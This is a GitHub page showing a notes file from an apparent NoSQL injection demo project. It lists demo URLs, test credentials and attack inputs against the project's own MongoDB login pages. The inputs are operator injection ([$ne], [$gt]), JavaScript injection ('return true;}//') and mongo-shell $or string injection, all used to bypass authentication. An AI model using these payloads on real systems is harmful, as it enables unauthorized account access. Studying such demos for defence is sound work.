-
Notifications
You must be signed in to change notification settings - Fork 14
/
operationDoc
74 lines (55 loc) · 2.02 KB
/
operationDoc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
(1)
Information-get
http://localhost/github/NoSQLInjectionAttackDemo/demo.html
http://localhost/github/NoSQLInjectionAttackDemo/detected_demo.html
correct input:
username:sunxiuyang
password:123456
wrong input:
username:sunxiuyang
password:12
attack URL
http://localhost/github/NoSQLInjectionAttackDemo/login/detected_login.php?username[$ne]=2&password[$ne]=r&login-submit=login
attack URL by myself
http://localhost/github/NoSQLInjectionAttackDemo/login/detected_login.php?username[$gt]=2&password[$gt]=1&login-submit=login
gt mean more than
(2)
information-match
http://localhost/github/NoSQLInjectionAttackDemo/demo_1.html
correct url
http://localhost/github/NoSQLInjectionAttackDemo/test_query1.php?username=1&password=1
wrong url
http://localhost/github/NoSQLInjectionAttackDemo/test_query1.php?username=1&password=1
injection url
http://localhost/injection/test_query1.php?username=1&password=2;return%20true;}//
(3)
mongoDB-match
http://localhost/github/NoSQLInjectionAttackDemo/demo_1.html
correct input:
username:1
password:1
wrong input:
username:1
password:2
attackURL:
http://localhost/github/NoSQLInjectionAttackDemo/login/login_1.php?username=1&password=2;return%20true;}//
(4)
mongoDB-admin
java version
because this is kind of mongoshell
username:123',$or:[{},{'a':'a
password:'}],$comment:'successful MongoDB
mongoDB-register
username:1234
password:1234','injection':'injection(自己发现的)
http://10.0.0.61:80/injection/login/login.php?username=sunxiuyang&password[$gt]=&login-submit=login
gt 大于
(5)
http://localhost/github/NoSQLInjectionAttackDemo/demo_2.html
login success
http://localhost/zend_workplace/NoSQLInjectionAttackDemo/login/demo_2.php?password=111&login-submit=submit
attack url
http://localhost/github/NoSQLInjectionAttackDemo/login/demo_2.php?password=123;return%20true;}//
(6)
http://219.223.240.36/NoSQLInjectionAttackDemo/demo_2.html
3-Set App Path (Current: /NoSQLInjectionAttackDemo/login/demo_2.php?password=2)